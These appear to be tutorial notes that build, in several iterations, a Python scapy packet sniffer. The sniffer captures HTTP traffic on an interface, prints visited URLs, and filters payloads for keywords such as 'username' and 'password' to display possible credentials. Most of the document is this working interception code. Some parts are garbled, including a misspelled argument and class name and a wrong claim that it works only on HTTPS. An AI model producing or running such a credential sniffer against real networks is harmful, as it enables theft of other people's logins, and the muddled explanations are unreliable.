PACKET_SNIFFER
CODE: BASE#1
- #!/usr/bin/env python
- import scapy.all as scapy
- def sniff(interface):
- scapy.sniff(iface=interface, store=False, prc=process_sniffed_packet)
- def process_sniffed_packet(packet):
- print(packet)
- sniff("eth0")
WITH DETAILS!
WE USE 3RD PARTY MODULE CUZ SCAPY DOESNOT USE HTTPS..
TO INSTALL 3RD PARTY MODULE: RUN:-ANY OF THE BELOW
- pip install scapy_http
- pip install layer.http
NOTE THIS PROGRAMME WILL ONLY WORK ON HTTPs/ |
#EXTRACTING DATA FROM A SPECIFIC LAYER
CODE: BASE#2
#EXTRACTING OUR DESIRE OUTPUT!
- #!/usr/bin/env python
- import scapy.all as scapy
- from scapy.layers import http
- def sniff(interface):
- scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
- def process_sniffed_packet(packet):
- if packet.haslayer(http.HTTPRepuest):
- print(packet.show())
- sniff("eth0")
EXAMPLE: EXTRACTING just LOGIN/USERNAME
CODE: MODEFIED#1
- #!/usr/bin/env python
- import scapy.all as scapy
- from scapy_http import http
- def sniff(interface):
- scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
- def process_sniffed_packet(packet):
- if packet.haslayer(http.HTTPRequest):
- if packet.haslayer(scapy.Raw):
- print(packet[scapy.Raw].load)
- sniff("eth0")
AN ISSUE:
If we wana sniff any further we get too many data again in the FIELD/LAYER[RAW/LOAD] itself hence we cannot find our desire stuffs
so to avoid this we use keywords
#USING KEYWORDS!!
[FINDING SUB-STRING CONTAIN IN A BIG STRING]
CODE: MODEFIED#2
#!/usr/bin/env python
import scapy.all as scapy
from scapy_http import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ["username", "userName", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
print(load)
break
sniff("eth0")
#EXTRACTING URLs!!
we use print(packet.show()) to find the field/layer in which the URLs is in...
CODE: MODEFIED#3
- #!/usr/bin/env python
- import scapy.all as scapy
- from scapy_http import http
- def sniff(interface):
- scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
- def process_sniffed_packet(packet):
- if packet.haslayer(http.HTTPRequest):
- url = packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
- print(url)
- if packet.haslayer(scapy.Raw):
- load = packet[scapy.Raw].load
- keywords = ["username", "userName", "login", "password", "pass"]
- for keyword in keywords:
- if keyword in load:
- print(load)
- break
- sniff("eth0")
CODE: MODEFIED#4[Applying more functions]
- #!/usr/bin/env python
- import scapy.all as scapy
- from scapy_http import http
- def sniff(interface):
- scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
- def get_url (packet):
- return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
- def get_login_info(packet):
- if packet.haslayer(scapy.Raw):
- load = packet[scapy.Raw].load
- keywords = ["username", "userName", "login", "password", "pass"]
- for keyword in keywords:
- if keyword in load:
- return load
- def process_sniffed_packet(packet):
- if packet.haslayer(http.HTTPRequest):
- url = get_url(packet)
- print("[+] HTTP Request >>" + url)
- login_info = get_login_info(packet)
- if login_info:
- print("\n\n[+] Possible username/password >" + login_info + "\n\n")
- sniff("eth0")
CODE: MODEFIED#4-COMPATIBLE WITH PYTHON-3
- #!/usr/bin/env python
- import scapy.all as scapy
- from scapy_http import http
- def sniff(interface):
- scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
- def get_url (packet):
- return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
- def get_login_info(packet):
- if packet.haslayer(scapy.Raw):
- load = str(packet[scapy.Raw].load)
- keywords = ["username", "userName", "login", "password", "pass"]
- for keyword in keywords:
- if keyword in load:
- return load
- def process_sniffed_packet(packet):
- if packet.haslayer(http.HTTPRequest):
- url = get_url(packet)
- print("[+] HTTP Request >>" + url.decode())
- login_info = get_login_info(packet)
- if login_info:
- print("\n\n[+] Possible username/password >" + login_info + "\n\n")
- sniff("eth0")